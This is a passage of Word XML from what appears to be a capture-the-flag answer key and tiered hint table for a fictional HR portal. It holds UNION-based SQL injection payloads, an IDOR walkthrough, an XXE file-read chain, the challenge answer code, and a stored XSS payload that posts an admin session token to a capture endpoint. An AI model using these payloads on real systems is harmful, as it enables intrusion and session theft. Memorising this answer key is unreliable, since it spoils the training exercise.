            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">x' UNION SELECT 'x','x','x' -- </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HR Requests </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9 (no extra paren)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5616"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">x' UNION SELECT 'x','x','x','x','x','x','x','x','x' -- </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6 — Document IDOR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>List view is correctly scoped; the detail route (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/peoplehub/documents/:id</w:t>
      </w:r>
      <w:r>
        <w:t>) only checks classification→role, never ownership, for personal document types. Try IDs sequentially outside your own list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7 — Employee Data Import (XXE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decoy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file:///etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> resolves to an obviously fake stub. The real chain, one file at a time:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file:///challenge-data/hr/migration-notes.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → points to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hr/directory-sync.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file:///challenge-data/hr/directory-sync.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → points to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>config/import-settings.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file:///challenge-data/config/import-settings.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → points to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>archive/migration-history.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file:///challenge-data/archive/migration-history.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>contains the emergency access code: `BLACKOUT-7`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8 — Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror="fetch('/api/peoplehub/feedback/capture',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({token:window.__ADMIN_SESSION_TOKEN__})})"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9 — Emergency Access &amp; Exhibit C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Submit an Emergency Access request with code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>BLACKOUT-7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (case-insensitive, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>crypto.timingSafeEqual</w:t>
      </w:r>
      <w:r>
        <w:t>) — skips straight to HR Approved. Then answer Exhibit C’s final question with the same code to complete Stage 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Tiered hints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shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tier 1 (nudge)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tier 2 (names it)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tier 3 (near-spoiler)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The login form doesn’t behave like a normal one under unusual input.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Classic SQL injection authentication bypass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A quote character breaks the query. Comment out the rest of it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Logging in got you </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>somewhere</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, but not very far.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The same injection point can target a specific row, not just "any row."</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UNION SELECT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the same table the login checks, ordered by privilege, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>LIMIT 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The search box behaves oddly with certain characters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UNION-based SQL injection; count the columns the results show you.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Close the string, close the grouping, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UNION SELECT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> matching column count, comment out the rest.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Employee Profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The profile URL carries an identifier. What if it’s not normal?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Same technique as Directory, different injection point, more columns.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Every column on the employee record plus one joined column.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A report lets you narrow to "one segment." Is that filter validated?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UNION injection again — small result shape.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Three columns: a dimension, a metric name, a metric value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR Requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR staff can search requests by more or less anything.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Same bug class as Directory — check the query shape carefully.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Nine columns; unlike Directory, no extra closing parenthesis needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The document list looks locked down. Does every path to a document agree?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authorization bug, not injection — IDOR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">The detail page checks document </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, not who it </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>belongs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Import / XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The import feature parses XML. What else can XML do?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>XXE. There’s a whole synthetic filesystem to explore.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Start with the migration notes; follow what each file points to next.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Feedback / XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A feedback "preview" is doing more than styling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stored XSS — the preview isn’t escaping input.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> won’t fire this way; an image error handler will.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Emergency Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>This page has an approval chain and an oddly disconnected field.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
